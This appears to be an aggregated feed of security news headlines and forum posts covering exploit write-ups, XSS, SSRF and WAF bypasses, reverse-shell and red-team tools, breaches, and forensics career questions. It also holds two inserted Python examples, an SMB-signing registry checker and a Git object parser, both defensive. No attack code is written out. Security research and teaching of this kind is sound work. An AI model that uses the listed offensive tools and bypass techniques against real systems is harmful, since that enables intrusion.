    submitted by /u/Hefty_Knowledge_7449
    CVE-2021-38297 - Technical analysis of a Go WebAssembly vulnerability
    submitted by /u/SRMish3
    Digging into an NTLM Downgrade Attack
    submitted by /u/0xdea
    MATE: Interactive Program Analysis with Code Property Graphs
    submitted by /u/sanitybit
  • Open

    Fuzzing Go APIs for SQL Injection
    Article URL: https://blog.fuzzbuzz.io/fuzzing-go-apis-for-sql-injection/ Comments URL: https://news.ycombinator.com/item?id=32664270 Points: 57 # Comments: 18
    Open-source fuzzer Jazzer.js brings fuzzing to JavaScript
    Article URL: https://www.code-intelligence.com/blog/jazzer.js Comments URL: https://news.ycombinator.com/item?id=32659564 Points: 1 # Comments: 1
  • Open

    SecWiki News 2022-08-31 Review
    Application security architecture design practice in the securities industry by ourren; Windows domain lateral movement examples by ourren. For more recent articles, visit SecWiki
  • Open

    mfa bypass in private program, the abdulsec way
  • Open

    How to use Rekono to automate penetration testing by combining multiple tools
    The tool chains together several other security tools to complete the whole penetration-testing process automatically.
    toxssin: a powerful XSS scanning, exploitation and payload-generation tool
    This penetration-testing tool helps researchers automatically scan for, detect and exploit cross-site scripting (XSS) vulnerabilities.
    FreeBuf Morning Report | Google launches an open source software vulnerability reward program; median annual pay for US CISOs approaches $1 million
    In 2022, median total compensation for US CISOs (including annualized equity and long-term incentives) rose from $936,000 to $971,000.
    Russian streaming platform START publicly confirms breach affecting 7.5 million users
    START's administrators say hackers stole a 2021 database from the company's systems and are now distributing samples online.
    Hackers spread malware using images taken by a space telescope
    The malware is written in Golang and uses a James Webb Space Telescope image to deliver its payload.
    FreeBuf in-house security community livestream roundup
    FreeBuf in-house security community | livestream series recap (continuously updated)
  • Open

    What's a typical day in the life of a Digital Forensics expert in law enforcement?
    Hi everyone. I'm applying for a Digital Forensics expert position at a law enforcement agency in Europe. In this agency, DF experts are sworn officers and have training at the academy like any other officer (although the focus is more on forensics). After the academy they are assigned to specific positions and career paths that differ from that of regular LE officers/agents. Does anyone have a similar experience and can explain a typical day in the life of a DF expert? submitted by /u/InfoSecSensei [link] [comments]
    I need activity history from my security cameras
    Someone logged into my accounts and deleted both my Ring camera footage and Blink camera footage on a particular day. To my understanding, when the footage is gone it can’t be recovered unless subpoenaed; however anything related to the time it was deleted or from where would help. This is non-negotiable. Thanks submitted by /u/OKsaving612 [link] [comments]
    What entry level jobs did anyone start out with?
    This field is harder to break into than Cyber Security itself. The closest thing I found was literally a malware analyst position where I can use forensic-related tools, but I can’t find anything on Handshake for students that has anything to do with computer forensics. submitted by /u/OhmyMary [link] [comments]
  • Open

    [Vulnerability Advisory] GitLab CE/EE remote command execution vulnerability (CVE-2022-299...
    A critical issue was found in GitLab affecting all versions before 15.1.6, from 15.2 to 15.2.4, and from 15.3 to 15.3.2; the vulnerability allows an authenticated user, via the GitHub import feature, to remotely...
  • Open

    Burp Suite price increases
    We are increasing prices for Burp Suite Professional and Burp Suite Enterprise Edition, due to a significant increase in costs caused by global inflation. The price of an annual Burp Suite Professiona
  • Open

    WinAPI and P/Invoke in C#
    Covers how you can use WinAPI in C# for red team tooling. https://crypt0ace.github.io/posts/WinAPI-and-PInvoke-in-CSharp/ submitted by /u/Potential_Waltz7400 [link] [comments]
  • Open

    movie posters
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Host operating system identification based on deep learning
    Author: 三牛 (墨云科技 VLab Team). Original: https://mp.weixin.qq.com/s/A6lFJMapxfPZJF6TCKLcKQ. From either an offensive or a defensive perspective, collecting and vetting information is essential, and the host's operating system type is a key starting point. Experience shows that the OS type usually gives a rough picture of where the risks lie and what kind they are, so identifying a host's OS is extremely important for network security defence. OS identification...
  • Open

    Microsoft ports Windows SymCrypt to Linux, bringing a FIPS certified drop-in module to OpenSSL
    submitted by /u/sanitybit [link] [comments]
    Announcing Google’s Open Source Software Vulnerability Rewards Program
    submitted by /u/sanitybit [link] [comments]
    Snakes on a Domain: An Analysis of a Python Malware Loader
    submitted by /u/sanitybit [link] [comments]
    reinschauer - A PoC to remotely control Windows machines over Websockets.
    submitted by /u/sanitybit [link] [comments]
    Going Atomic: The Strengths and Weaknesses of a Technique-centric Purple Teaming Approach
    submitted by /u/sanitybit [link] [comments]
    Bootkitting Windows Sandbox
    submitted by /u/mrexodia [link] [comments]
    hashcathelper: Convenience tool for hashcat - crack NT hashes by taking LM hashes into account; generate analytics for cracked passwords; visualize "SamePassword" clusters in Bloodhound
    submitted by /u/0xfffffg [link] [comments]
    CVE-2022-26113: FortiClient Arbitrary File Write As SYSTEM
    submitted by /u/hackers_and_builders [link] [comments]
    Write-up of N-day exploit for CVE-2022-2586: Linux kernel nft_object UAF
    submitted by /u/gid0rah [link] [comments]
    Truth Behind the Celer Network cBridge cross-chain bridge incident: BGP hijacking
    submitted by /u/sanitybit [link] [comments]
    Tetsuji: Remote Code Execution on a GameBoy Colour 22 Years Later
    submitted by /u/sanitybit [link] [comments]
    Incident Response in AWS
    submitted by /u/sanitybit [link] [comments]
  • Open

    Notes on Intelligence and Cyber Intelligence
    I am working through whatever sources I can find to improve myself by learning new things about cyber intelligence. The material I have worked on… Continue reading on Medium »
  • Open

    What is a Forensics Consulting job like?
    Hello all, I've been studying DFIR for years and I'm in Incident Response nowadays. I have been picturing myself becoming a consultant for DFIR because I've spent quite a bit of time working indirectly with consultants of other fields and I've seen how they are able to work hard for a few months and make enough money that they can then just stop working until the next job comes along. My question is whether that is actually what consulting looks like anywhere in DFIR and if not what does it look like? I know I would have to continue to keep up with learning either way and I'm not looking for something easy. I just love the idea of dedicating myself to something worthwhile while being able to take time off in between. For some background, I have a chance to move into a dedicated forensics position at my current company and the only hang up is that I'd be going from fully remote to fully in office or maybe hybrid so I'm trying to figure out how much I want to sacrifice for the sake of career advancement and where that can take me is a huge factor. submitted by /u/drfantabulo [link] [comments]
    Leading Digital Forensics Graduate Programs?
    Hey everyone, I'm looking to get my master's in digital forensics fully online. I currently have a BA in Cybersecurity and two minor degrees, one in computer forensics and one in IT! One program I found that I'm interested in is Michigan State University's cybercrime and digital investigations master's, but I want to know what the highly regarded colleges are in case they can give me a better education. Any help is appreciated since this seems like a harder master's to find at larger institutions. Before asking here I checked on r/netsec and the Academic Program threads I found are all 3+ years old that the FAQ here asks you to check first. Thank you! submitted by /u/Cyberqtea [link] [comments]
    imaging missing folder
    Hi y'all, I'm trying to acquire an AWS snapshot but when I do the acquisition I see that there is at least one folder missing. I have the snapshot unmounted and I used dcfldd and FTK Imager and neither are able to get the folder I need. For reference, I'm trying to acquire a web server and the folder I need is the website within the user's home directory. The folder isn't a symbolic link so I'm looking in the right place. I'm very confused. Any ideas? submitted by /u/shonen787 [link] [comments]
    IT Technician looking to move to the Digital Forensics world
    TLDR: I would like to get an entry level certificate in digital forensics, but I don't know where to start. I need your suggestions. I currently work as a level 1 data center technician. I only work with hardware but I have some Linux knowledge I gained in my free time. I would like to start a career in the digital forensics world. I remember taking a course a long time ago about using apps to investigate devices owned by criminals and creating a chain of custody. I don't remember anything from that course, but I remember enjoying it at the time and I am wondering if there is an entry level certificate for something like that. Edit: is there such a certificate focused on phones? submitted by /u/Lostinsssst [link] [comments]
    Malware analyst intern should I apply?
    Hey, there is this internship for a malware analyst and cyber threats intern that Handshake says I'm qualified for, but I have no cyber security experience, just computer forensics. I haven't done any cyber security work, but I'd think as an intern I need to have some understanding of how to detect malware. Should I apply to this position? For $15/hr I figure that for low pay it can't be that bad, but I'm skeptical whether it's right for me. submitted by /u/OhmyMary [link] [comments]
  • Open

    Abusing Open Redirects to get an Account Takeover
    It was the end of another semester, and I was really bored, so decided to take a look at the system that my college uses to store and… Continue reading on Medium »
    Blind SSRF due to img tag injection in page form
    Today we’re going to talk about SSRF attack that allows hackers to send any network requests from the back-end server by using tags. Continue reading on Medium »
    Let’s hack websites and make money!
    Without the jail time. lol Continue reading on Medium »
    My findings on Hack U.S Program
    Hello everyone, I'm Charan (also known as falcon_319) in the bug bounty community; I am an occasional bug bounty hunter and agriculture… Continue reading on Medium »
    SSRF — Exploitation 02
    Successful Cyberattacks often start at the “Network Perimeter”. Continue reading on InfoSec Write-ups »
    New Zealand’s #1 Bug Bounty Platform is now Inviting the first 500 hackers
    We are preparing to launch Capture The Bug, NZ’s first bug bounty platform. And are welcoming bug hunters from around the world to share… Continue reading on Medium »
  • Open

    ipfs or something?
    These links are cool, but also slow. Is there some way to speed them up or filter down to the ones that are faster? I tried looking for ipfs ones, they were equally slow or broken. there used to be some free to use CDNs, I think coral was one - it's probably mostly dead, but I bet there are new ones based on webrtc data-channel... Or is there just a better place to find specifically this kind of stuff but faster? Remember kodi/xbmc? Did it use directories like these or something quite a bit more organized? submitted by /u/Admirable_Bass_1948 [link] [comments]
    Nope+Prey
    http://37.187.115.51 submitted by /u/caculo [link] [comments]
    Not Sole Admin of Google Unlimited Account - Security
    I recently came across a way to get a Google unlimited account on the cheap. It works as it should... though I've been reluctant to use it. Upon reading the terms of service on a Google Drive account shared to me by the Organization Admin, it says the admin has the right to all content, to add or delete... so this raises a huge security question for me. I don't plan on putting anything personal in this account, simply rips of content for us all to enjoy. I just wonder if there's some way the video files on there could be edited and turned against the other users of the shared Google Drive. Google says they monitor for warez and hacks and such, but who knows how accurate that is. My main concern would be to get keylogged or something like that from simply adding files and playing them occasionally through players. What are your thoughts guys, would love to hear 'em. Found another unlimited storage overseas service that would be an FTP server, which I could work with as well, and for this one I would be admin of the account. A little pricier but could be worth it? submitted by /u/AcidAlchamy [link] [comments]
  • Open

    OWASP Network Segmentation Cheat Sheet
    Hi, I wrote https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets_draft/Network_Segmentation_Cheat_Sheet.md, but it is still in draft mode, can you help? submitted by /u/Marotso [link] [comments]
    Security breach, open to see for anyone - How should I tell?
    Let's suppose that a friend of a friend was wandering around the internet WITHOUT any offensive tools and found out that some idiot has an open HTTP server with all his personal and family photos on it. Let's suppose as well that the friend of my friend couldn't simply mind his own business since it's about the very information safety of a person, and managed to find, among all that data, some sort of contact which could point to that person, by means of the company he works at. Let's add to that that the guy is Russian. How should my friend's friend proceed to tell the guy about it without getting into trouble? submitted by /u/drgetbetter [link] [comments]
  • Open

    Announced: Google's OSS Vulnerability Rewards Program
    Article URL: https://security.googleblog.com/2023/08/Announcing-Googles-Open-Source-Software-Vulnerability-Rewards-Program%20.html Comments URL: https://news.ycombinator.com/item?id=32653620 Points: 2 # Comments: 1
  • Open

    TikTok's pixel/sdk.js leaks current URL from websites using postMessage
    TikTok disclosed a bug submitted by fransrosen: https://hackerone.com/reports/1598749 - Bounty: $1500
  • Open

    SecWiki News 2022-08-30 Review
    SecWiki Weekly (Issue 443) by ourren. For more recent articles, visit SecWiki
  • Open

    hackmyvm series 5: Pwned
    This article is for technical discussion and learning only; do not use it for illegal purposes. The author bears no responsibility for illegal use.
    hackmyvm series 6: connection
    This article is for technical discussion and learning only; do not use it for illegal purposes. The author bears no responsibility for illegal use.
    vulnhub series 12: DC 6
    FreeBuf Morning Report | US Army recruits "national hackers"; Tesla hit with class action over phantom braking
    This week the US Army announced it is recruiting a cyber-warfare force to defend against cyberattacks launched by foreign governments.
    National Health Commission and two other departments issue the "Measures for the Administration of Network Security of Medical and Health Institutions"
    The Measures comprise 34 articles in five chapters: general provisions, network security management, data security management, supervision and management, and management safeguards; they apply to the security management of networks operated by medical and health institutions.
    US FTC sues data broker Kochava over the sale of sensitive location data from hundreds of millions of phones
    The lawsuit seeks to stop Kochava from collecting sensitive geolocation data and to require the company to delete the data it has already collected.
    How to use crAPI to learn API security
    crAPI is deliberately built with a large number of security vulnerabilities, so it can be used to learn and study API security.
    hoaxshell: a powerful unconventional Windows reverse shell
    The tool generates its own PowerShell payload, supports encryption, and can be used to test the security of Windows systems.
    COVID-19 patient data being sold on the dark web
    Researchers found patient personally identifiable information (PII) leaked from Thailand's Department of Medical Sciences, including data on some COVID-19 patients.
    Incalculable losses! Reports circulate that Yonyou and other leading software vendors were hit by ransomware
    Some security vendors say the ransomware attack may have been delivered through supply-chain contamination or exploitation of a vulnerability.
  • Open

    Exploiting PrintNightmare (CVE-2021–34527)
    Article URL: https://infosecwriteups.com/exploiting-printnightmare-cve-2021-34527-10c6e0f5b83f?gi=8d08f1a86b88 Comments URL: https://news.ycombinator.com/item?id=32650687 Points: 2 # Comments: 0
  • Open

    Write-up: Authentication bypass via OAuth implicit flow @ PortSwigger Academy
    File Leakage, Blockchain Security, Bypass 2FA, Kerberoasting, Exploiting Security Bugs, and…
    Hack With SQL Injection Attacks! DVWA medium security — StackZero
    AWS Attribute-Based Access Control (ABAC) With Tags
    SSRF — Exploitation 02
  • Open

    What does a CHIEF INFORMATION SECURITY OFFICER (CISO) do?
    This Cybersecurity role is responsible for the IT Security Strategy of the organization. In this article I will describe the role of the… Continue reading on Medium »
    [Repo] Shellcode Loader
    Shellcode, for those who often deal with reverse engineering and offensive operations (pentest, exploit development, adversary… Continue reading on Reversing.ID »
  • Open

    404 StarLink Project | Big news! Many excellent new projects have joined us
    About the StarLink Project: the "404 StarLink Project" is an open-source project collection initiative launched by Knownsec 404 Lab in August 2020. Its original aim was to release some of 404 Lab's internal tools as open source so they could deliver more value; this was "404 StarLink 1.0", which included well-known tools such as Pocsuite3 and ksubdomain, and we soon received a lot of good feedback. In November 2020 we turned our attention to the whole security community, using StarLink members as the core to select high-quality, meaningful, interesting and persistent...
    Analysis of the Chrome V8 command execution vulnerability (CVE-2022-1310)
    Author: 墨云科技 VLab Team. Original: https://mp.weixin.qq.com/s/CBj03EPBlsGe689Lc74qHQ. On 11 April 2022 Google released Chrome 100.0.4896.88, which fixed a use-after-free in the regular-expression module reported by @btiszka on 18 March; on 28 June Google disclosed the specifics of the bug. The vulnerability is now patched and the technical details are public; this article starts from the tech...
    Identifying host OS version and usernames via the RDP protocol
    Author: 阿布 (墨云科技 VLab Team). Original: https://mp.weixin.qq.com/s/91g9szVMDyXC17u6Vx453A. RDP (Remote Desktop Protocol) is a multi-channel protocol that lets a user connect to a computer offering Microsoft Terminal Services. RDP is mostly used on Windows operating systems...
  • Open

    Pentesting on MacBook Pro M1?
    I'm up for a laptop renewal within my company and they sent me the latest MacBook pro. However, only now I realized that the M1 chip only supports ARM (unlike Intel chipset) and I hear people having trouble running windows and Kali virtualization on the Mac using parallels and VMware Fusion. I do all types of testing (internal, web, cloud, mobile, wireless, etc) and primarily use windows commando and Kali VMs for testing. Wondering from anyone going through the same thing as me on how practical it is on the M1 MacBook and do you have trouble running the tools or should I consider returning it and requesting my company to send a Dell windows laptop instead? Thanks. submitted by /u/Pixarnian [link] [comments]
    Second Eyeing SMB Misconfiguration
    Hi All, Looking at an SMB configuration by looking at registry key values of the domain controller. FYI, registry keys are the only source of data I have for now. I want to know based on what I've retrieved if the DCs are vulnerable to any of the SMB vulnerabilities out there. Looking at registry HKLM\System\CurrentControlSet\Services\LanManServer\Parameters\ on multiple DCs, I see that RequireSecuritySignature is an int value of 0 which means it is not required. At the same time, EnableSecuritySignature and RestrictNullSessAccess are 1 which is good. No SMB1 was found on these servers. So SMB signing looks something like this atm: RequireSecuritySignature = FALSE, EnableSecuritySignature = TRUE. Now I know SMB signing is important to be enabled, but what confuses me is that according to MS, "The EnableSecuritySignature registry setting for SMB2+ client and SMB2+ server is ignored. Therefore, this setting does nothing unless you're using SMB1. SMB2 signing is controlled solely by being required or not." What this tells me is that EnableSecuritySignature is not entirely relevant here, and RequireSecuritySignature should be the value/parameter of focus? Is it ok for RequireSecuritySignature to be 0, or can NTLM relay still be conducted on this machine or the network? To verify this finding as bad, must I know the workstation/client configurations to see if those are set to 1 on every workstation, basically the group policy setting for clients to require a security signature, or can I view this finding as bad in itself? submitted by /u/Inevitable_Star615 [link] [comments]
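    As an added example, not part of the post above: a Python script that parses a `reg query` export of the two SMB signing keys and applies the rule the post quotes from Microsoft, that for SMB2+ only RequireSecuritySignature matters and EnableSecuritySignature is ignored. The security-relevant point is that a server whose RequireSecuritySignature is 0 accepts unsigned sessions, which is exactly what an NTLM relay to SMB on that host needs; client-side signing policy on other machines does not protect the server. The registry text below is constructed to match the values described in the post, and the function and variable names are this example's own.

```python
import re

# Constructed sample of `reg query <key>` output for the two SMB signing keys.
# The values are hypothetical and mirror the situation described in the post.
SAMPLE_REG_OUTPUT = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanManServer\\Parameters
    EnableSecuritySignature    REG_DWORD    0x1
    RequireSecuritySignature    REG_DWORD    0x0
    RestrictNullSessAccess    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters
    EnableSecuritySignature    REG_DWORD    0x1
    RequireSecuritySignature    REG_DWORD    0x0
"""

# A key header line names either the SMB server or the SMB client parameters.
KEY_RE = re.compile(
    r"^HKEY_LOCAL_MACHINE\\.*\\Services\\(LanManServer|LanmanWorkstation)\\Parameters\s*$",
    re.I,
)
# A value line inside a key: "<name>  REG_DWORD  0x<hex>".
VALUE_RE = re.compile(r"^\s+(\w+)\s+REG_DWORD\s+0x([0-9a-f]+)\s*$", re.I)


def parse_reg_query(text):
    """Return {"server": {...}, "workstation": {...}} with the DWORD values under each key."""
    values = {}
    current = None
    for line in text.splitlines():
        key = KEY_RE.match(line)
        if key:
            current = "server" if key.group(1).lower() == "lanmanserver" else "workstation"
            values.setdefault(current, {})
            continue
        val = VALUE_RE.match(line)
        if val and current:
            values[current][val.group(1)] = int(val.group(2), 16)
    return values


def assess_smb_signing(values, smb1_enabled=False):
    """Apply the SMB2+ rule: only RequireSecuritySignature decides whether signing is enforced.

    Returns a list of (role, severity, message). A missing value is reported as unknown
    rather than guessed, because defaults differ between member servers and DCs."""
    findings = []
    roles = (("server", "Server (LanManServer)"), ("workstation", "Client (LanmanWorkstation)"))
    for role, label in roles:
        params = values.get(role)
        if params is None or "RequireSecuritySignature" not in params:
            findings.append((role, "unknown", f"{label}: RequireSecuritySignature not in export"))
            continue
        if params["RequireSecuritySignature"] == 1:
            findings.append((role, "ok", f"{label}: signing required"))
        elif role == "server":
            findings.append((role, "weak", f"{label}: signing not required; host accepts unsigned "
                             "SMB2+ sessions, so relayed NTLM authentication to SMB on it works"))
        else:
            findings.append((role, "weak", f"{label}: signing not required; client will negotiate "
                             "unsigned sessions with servers that do not require signing"))
        enable = params.get("EnableSecuritySignature")
        if enable is not None and not smb1_enabled:
            findings.append((role, "info", f"{label}: EnableSecuritySignature={enable} is ignored "
                             "for SMB2+; it only matters when SMB1 is enabled"))
    return findings


if __name__ == "__main__":
    for role, severity, message in assess_smb_signing(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print(f"[{severity:7}] {message}")
```

    On a real host, feed the script the output of `reg query HKLM\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters` and the matching LanmanWorkstation key; the server-side "weak" finding stands on its own, independent of how clients are configured.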
  • Open

    some NSFW
    submitted by /u/thiskeepsmeupatnight [link] [comments]
  • Open

    Update classes questions
    I am looking to get back into Digital Forensics. I took the Federal Law Enforcement Training Centers computer forensics course back in 2000 and did recoveries etc for several years. That eventually got me on a federal task force where I went undercover for almost a year and arrested 187 offenders. After that, I took a break and did background investigations and later went back into LE investigations. I have done some recovery work etc since then but not a ton. I figure I have to go back and take some new classes as I learned on windows 98. I really don't know what I should take at this point though. I looked at SANS FOR500 but that seems to be more than I need, I also looked into the ISFCE CCE Bootcamp but reviews indicate that some of what they teach is outdated, and not a lot of positions list it as a requirement. I have also seen other certification classes CFCE, EnCase, ACE, etc. I really don't know what I should take to update my skills but keep me from reinventing the wheel. submitted by /u/Playful_Ear203 [link] [comments]
    Took my first practice test.. any tips??
    submitted by /u/Bulevine [link] [comments]
    Autopsy unallocated files - zero bytes on extraction...
    Anyone have any experience of using Autopsy with an image of an old laptop? I can see some files I'm trying to recover - they show as unallocated but when using the right click 'export to' option in Autopsy they end up being zero byte size. Any thoughts on recovery? submitted by /u/stek2022 [link] [comments]
    Android DB Question
    I am trying to identify the DB that would contain information about users that have been blocked on the device. I have found information on the developer android site that it may be in the field "android.provider.BlockedNumberContract" - but I can't find that field in a current dump, so I want to find the DB and parse through to find the blocked users' information. Any ideas? Thanks submitted by /u/GunnyUSMCRockin [link] [comments]
    What's on My DFIR Box?
    Good morning, It’s time for a new 13Cubed episode! By popular request, this episode provides a walkthrough of the hardware and software I utilize for my digital forensic workstation. While this is probably more beneficial for people new to the DFIR field, I suspect it will still be interesting to a wide range of viewers. Episode: https://www.youtube.com/watch?v=-xGfzCT6TUQ Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    Ethernaut CTF walkthrough with Brownie framework
    submitted by /u/Glittering_Audience8 [link] [comments]
    jscythe: Abuse the node.js inspector mechanism to force any node.js/electron/v8 based process to execute arbitrary javascript code.
    submitted by /u/sanitybit [link] [comments]
    Part 1 – SingPass RASP Analysis
    submitted by /u/jeandrew [link] [comments]
    Blind exploits to rule WatchGuard firewalls: pre-auth RCE as root on WG appliances
    submitted by /u/cfambionics [link] [comments]
    A technical analysis of Pegasus for Android – Part 1
    submitted by /u/CyberMasterV [link] [comments]
    Vision2 this script analyses the Nmap XML scanning results parses each CPE context and correlates to search CVE on NIST. You can use that to find public vulnerabilities in services.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Linux Kernel Exploit (CVE-2022-32250) with mqueue
    Article URL: https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Comments URL: https://news.ycombinator.com/item?id=32644120 Points: 1 # Comments: 0
    Blind exploits to rule Watchguard firewalls (CVE-2022-31789, CVE-2022-31790)
    Article URL: https://www.ambionics.io/blog/hacking-watchguard-firewalls Comments URL: https://news.ycombinator.com/item?id=32638687 Points: 1 # Comments: 0
  • Open

    Git object decompress
    Using perl to decompress Git objects. Using "perl -MCompress::Zlib -e 'undef $/; print uncompress()'" and I know it works. When I attempt to decompress one of the tree object, the results are in literal bytes. I was expecting a hash for the blob object, but I get a bunch of ?????ff???1?: 1W?\ Anyways, when I use python3, I get b'tree 69\x004000 code\x00\x9c\xf4f...' at which point I can almost reconstruct the full hash. It's not perfect either. Can anyone shed some light? submitted by /u/derpiestGuy [link] [comments]
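    As an added example, not from the post above: a decompressed tree object looks like raw bytes because git stores each entry's object name as 20 binary SHA-1 bytes, not 40 hex characters, so the payload has to be parsed rather than printed. The Python below builds a constructed blob and tree, compresses them the way git stores loose objects, then inflates them, splits the "<type> <size>\0" header, decodes the tree entries and recomputes each object id. Function names and the sample content are this example's own.

```python
import hashlib
import zlib


def git_header(obj_type, payload):
    """Loose-object header: '<type> <size>' followed by a NUL byte."""
    return f"{obj_type} {len(payload)}".encode() + b"\x00"


def object_id(obj_type, payload):
    """Git object name: SHA-1 over the uncompressed object, header included."""
    return hashlib.sha1(git_header(obj_type, payload) + payload).hexdigest()


def pack_object(obj_type, payload):
    """Produce the zlib-compressed bytes git writes to .git/objects/xx/yyyy..."""
    return zlib.compress(git_header(obj_type, payload) + payload)


def parse_object(compressed):
    """Inflate a loose object and split the header from the payload; verify the size."""
    raw = zlib.decompress(compressed)
    header, _, payload = raw.partition(b"\x00")
    obj_type, size = header.decode().split(" ")
    if int(size) != len(payload):
        raise ValueError(f"size mismatch: header says {size}, payload has {len(payload)} bytes")
    return obj_type, payload


def parse_tree(payload):
    """Decode tree entries: '<mode> <name>\\0' then a raw 20-byte SHA-1 (binary, not hex)."""
    entries = []
    pos = 0
    while pos < len(payload):
        nul = payload.index(b"\x00", pos)
        mode, name = payload[pos:nul].decode().split(" ", 1)
        sha = payload[nul + 1:nul + 21]
        if len(sha) != 20:
            raise ValueError("truncated tree entry")
        entries.append((mode, name, sha.hex()))
        pos = nul + 21
    return entries


def build_sample_objects():
    """Constructed sample: one blob containing 'hello\\n' and a tree pointing at it."""
    blob = b"hello\n"
    tree_payload = b"100644 hello.txt\x00" + bytes.fromhex(object_id("blob", blob))
    return {"blob": pack_object("blob", blob), "tree": pack_object("tree", tree_payload)}


if __name__ == "__main__":
    for name, compressed in build_sample_objects().items():
        obj_type, payload = parse_object(compressed)
        print(f"{name}: type={obj_type} id={object_id(obj_type, payload)}")
        if obj_type == "tree":
            for mode, fname, sha in parse_tree(payload):
                print(f"  {mode} {sha}\t{fname}")
```

    To inspect a real repository, read a file under .git/objects/ and pass its bytes to parse_object; the recomputed id must match the path the object was read from, which is a quick integrity check when examining a repository of unknown provenance.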
    Red Teaming Methodology
    Hi, could you tell me what the methodology or steps to follow for a red team exercise are? Thanks. submitted by /u/Equivalent_Year154 [link] [comments]
    Vision2
    This script analyses the Nmap XML scanning results, parses each CPE context and correlates to search CVE on NIST. You can use that to find public vulnerabilities in services. https://github.com/CoolerVoid/Vision2 submitted by /u/CoolerVoid [link] [comments]
  • Open

    Hack With SQL Injection Attacks! DVWA medium security — StackZero
    In this simple tutorial we are going to keep learning SQL injection by exploiting DVWA at medium and high security level. Continue reading on InfoSec Write-ups »
    Avaware Audits — Peace Of Mind For Projects & Users
    The end of August is upon us already! The cryptocurrency community feels like it’s waking up from a short slumber compared to the last few… Continue reading on Medium »
    SUBDOMAIN TAKEOVER
    What are Subdomains? Continue reading on Medium »
    Bypassing Amazon WAF to pop an alert()
    Hey everyone, its been a while since I published anything. This time, I’ll be sharing how I bypassed Amazon WAF to get XSS on the target… Continue reading on InfoSec Write-ups »
    How I bypassed Reflected XSS in well-known platform
    What is a XSS attack Continue reading on Medium »
    Bug Bounty For Beginners
    In this version of the Bug Bounty methodology and techniques I use during the recon and fingerprinting phase of an engagement. As you… Continue reading on Medium »
    Learn to Hack Web Apps for Free
    Hello, everyone. I hope everything is going well for you. I am back again with another article and this time I will be guiding you on how… Continue reading on Medium »
    PVR Account Takeover via CSRF
    Hi all Continue reading on Medium »
  • Open

    What is OSINT and how can a SOAR help with that?
    If you’re not familiar with the term “OSINT”, it stands for “Open Source Intelligence”. In a nutshell, it’s any intelligence that can be… Continue reading on Medium »
  • Open

    weak protection against brute-forcing on login api leads to account takeover
    Palo Alto Software disclosed a bug submitted by zer0code: https://hackerone.com/reports/766875
  • Open

    Kerberos Delegation
    Hey friends, it is the 3rd article in my Active Directory Theory and Exploitation series. Today, I would like to talk about 3 types of… Continue reading on Medium »
    What does an ETHICAL HACKER do?
    You want to hack legally? Then become a penetration tester. Continue reading on Medium »
    [Red Series] AMSI Bypass
    Hello all! Continue reading on MII Cyber Security Consulting Services »
  • Open

    SecWiki News 2022-08-29 Review
    [HTB] Jeeves Writeup by 0x584a. For more recent articles, visit SecWiki
  • Open

    Tor 101: How Tor Works and its Risks to the Enterprise
    People use Tor for both benign and malicious reasons, but allowing Tor traffic on enterprise networks opens the door to security risks. The post Tor 101: How Tor Works and its Risks to the Enterprise appeared first on Unit 42.
  • Open

    Sliver replaces Cobalt Strike as hackers' new favourite intrusion tool
    The open-source, cross-platform tool Sliver is replacing Brute Ratel as the weapon favoured by attackers.
    How to use jwtXploiter to test the security of JSON Web Tokens
    jwtXploiter helps researchers test the security of JSON Web Tokens and can identify all known CVEs affecting JWTs.
    Password-manager giant LastPass suffers cyberattack; source code leaked
    Password-manager giant LastPass was hacked two weeks ago; the attackers were able to steal the company's source code and proprietary technical information.
    FreeBuf Morning Report | US food-delivery giant DoorDash suffers data breach; hackers steal LastPass source code
    The legal representative of a software company who illegally controlled the computer systems of more than 40 financial institutions was sentenced to six years in prison and fined RMB 3.698 million.
    Vulnerability in Atlassian Bitbucket Server and Data Center
    The vulnerability could allow an attacker to execute malicious code; Atlassian has released a fix.
    With DDoS, LockBit ransomware is becoming more dangerous
    LockBit says it is improving its defences against DDoS attacks in response to attacks from security organisations, and using this to strengthen its extortion capability.
  • Open

    Bypassing Amazon WAF to pop an alert()
    Definitive Guide to SQL Injection
    Introduction Continue reading on InfoSec Write-ups »
    Secure Messaging
    Confidentiality, Reliability, Privacy, Usability, Cross-Platform support… — So many things to consider! Continue reading on InfoSec Write-ups »
    Double free() attacks in ARM Part one.
    Out-of-Band Remote Code Execution (RCE) on De Nederlandsche Bank N.V. with Burp Suite Collaborator
  • Open

    Bypassing antivirus hooks via dynamic link libraries - Break JVM
    Author: 倾旋. Original: https://payloads.online/archivers/2022-08-11/1/. After obtaining a Java webshell, the most common scenario is running into the 数字杀毒 antivirus, where commands often cannot be executed or are blocked; many people give up at this point. I guessed that a process-chain detection mechanism was preventing command execution, so I looked at the Java documentation and found that Java can load dynamic link libraries and execute dynamic link...
    CVE-2021-22600: exploitation and analysis via modprobe_path and USMA
    Author: knaithe (天玄安全实验室). Original: https://mp.weixin.qq.com/s/gu6O-ZSIiVpNJP1I9O94wQ. Vulnerability description: the bug is in /net/packet/af_packet.c. rx_owner_map references pg_vec; when switching to the TPACKET_V3 protocol version, pg_vec is freed once at the end of packet_set_ring() without rx_ow...
    Notes on Ruby Security
    Author: NiuBL (墨云科技 VLab Team). Original: https://mp.weixin.qq.com/s/ECLwMbbrf9lWXkhbUergXg. As Ruby grows in popularity, Ruby-related security issues are gradually surfacing, yet there are few Chinese-language articles dedicated to Ruby security. This article combines the author's knowledge of Ruby security with Ruby vulnerabilities they have discovered, in the hope of helping readers with Ruby code audits. Introduction to Ruby: Ru...
    Analysis of the Cisco RV340 wfapp command injection vulnerability (CVE-2022-20827)
